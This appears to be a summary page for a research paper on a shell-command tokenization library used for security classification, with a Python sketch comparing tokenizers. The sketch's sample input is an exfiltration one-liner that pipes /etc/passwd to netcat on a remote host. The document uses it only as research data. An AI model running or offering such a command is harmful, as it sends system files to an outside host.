Shell Language Processing: Unix command parsing for Machine Learning
Dmitrijs Trizna

TL;DR
This paper introduces a Shell Language Preprocessing (SLP) library for parsing Unix and Linux shell commands. On a security classification task, it raises the F1 score from 0.392 to 0.874 compared with widely used ICT tokenization techniques.
Contribution
The paper presents a novel tokenization and encoding approach tailored for shell commands, addressing limitations of conventional NLP pipelines.
Findings
F1 score improved from 0.392 to 0.874 in security classification
Method outperforms standard ICT tokenization techniques
Highlights the need for specialized preprocessing in shell command analysis
Abstract
In this article, we present a Shell Language Preprocessing (SLP) library, which implements tokenization and encoding aimed at parsing Unix and Linux shell commands. We describe the rationale for a new approach, with specific examples of cases where conventional Natural Language Processing (NLP) pipelines fail. Furthermore, we evaluate our methodology on a security classification task against widely accepted information and communications technology (ICT) tokenization techniques and achieve a significant improvement in F1 score, from 0.392 to 0.874.
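To illustrate the kind of failure the abstract refers to, the sketch below contrasts a generic word-and-punctuation tokenizer with a shell-aware split. It is a minimal illustration only: it relies on Python's standard-library `shlex` module rather than the SLP library, whose API is not shown in this summary, and the sample command and the helper names `word_tokenize` and `shell_tokenize` are hypothetical.

```python
import re
import shlex

# Hypothetical sample command, chosen for illustration only.
command = "cat /etc/passwd | nc 10.0.0.5 4444"


def word_tokenize(text):
    """Generic NLP-style tokenizer: runs of word characters or single punctuation marks."""
    return re.findall(r"\w+|[^\w\s]", text)


def shell_tokenize(text):
    """Shell-aware split using POSIX quoting rules (stdlib shlex, not the SLP library)."""
    return shlex.split(text)


generic_tokens = word_tokenize(command)
shell_tokens = shell_tokenize(command)

# The generic tokenizer breaks the path and the IP address into fragments,
# while the shell-aware split keeps each argument as a single token.
print(generic_tokens)
print(shell_tokens)
```

In this sketch the generic tokenizer splits `/etc/passwd` and `10.0.0.5` into separate pieces, which discards exactly the units (file paths, addresses, flags) that a security classifier would likely need to see intact.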
Taxonomy
Topics: Advanced Malware Detection Techniques · Software Engineering Research · Security and Verification in Computing
